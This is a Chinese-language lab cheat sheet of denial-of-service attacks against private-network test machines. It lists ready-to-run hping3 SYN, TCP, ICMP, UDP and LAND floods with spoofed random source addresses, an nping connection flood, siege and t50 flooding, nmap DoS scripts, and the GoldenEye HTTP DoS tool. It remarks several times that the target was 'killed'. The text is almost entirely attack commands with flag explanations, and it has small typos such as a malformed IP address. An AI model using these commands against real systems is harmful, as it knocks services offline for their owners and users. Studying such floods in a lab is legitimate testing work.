Hping3
几乎可以发送任何TCP/IP 数据包,用于测试FW、端口扫描、性能测试。
Syn Flood 攻击
方式1
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.2.100
#-c:发多少个包
#-d:数据段有多大
#-S:Syn数据包
#-w:tcp头window的大小(默认就是64)
#-p:攻击目标端口
#--flood:以flood 方式发送
#--rand-source:随机源地址
此时靶机已经被打死:
方式2
hping3 -S -P -U -p 80 --flood --rand-source 192.168.2.100
此时靶机同样被打死:
TCP Flood 攻击
hping3 -SARFUP -p 80 --flood --rand-source 192.168.2.100
ICMP Flood 攻击
hping3 -q -n --icmp -d 200 --flood --rand-source 192.168.2.101
#-n:不解析域名
#-a:伪造源地址
UDP Flood 攻击
hping3 --udp -s 53 -d 100 -p 53 --flood 192.168.2.101
LAND 攻击
特殊类型SYN Flood 攻击
源地址和目标地址都是受害者,受害者与自己完成三次握手。
hping3 -n -a 192.168.2.101 -S -d 100 -p 80 --flood 192.168.2.101
Nping
TCP 全连接 DoS 攻击
nping --tcp-connect --rate=10000 -c 100000000 -q 192.168.2.101
成功打死:
Siege
http(s) 压力测试工具,模拟多个用户并发访问。
安装:
spt-get install siege
修改上限:
vi /etc/siege/siegerc
将limit 255改为limit 100000
siege -i -c -t 5 1000 http://192.168.2.101/dvwa/login.php -A Useragent -vv
#-i:模拟用户
#-c:用户数量
#-t:持续5分钟
#-A:Useragent
"concurrency"是实际并发数,取决于攻击方性能。
T50 压力测试
t50 192.168.2.101 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.2.101 --flood --turbo -S --protocol TCP UDP OSPF EIGRP --dport 80
Nmap
进入nmap脚本目录:
cd /usr/share/nmap/scripts
cat script.db | grep dos | cut -d "\"" -f 2
使用方法:
nmap -p445 --script=smb-vuln-ms10-054.nse 1.1.1.1
GoldenEye
下载地址:https://github.com/jseidl/GoldenEye/archive/master.zip
使用方法:
./goldeneye.py http://192.18.2.2.102 -w 500 -s 10 -m random
效果明显,直接打死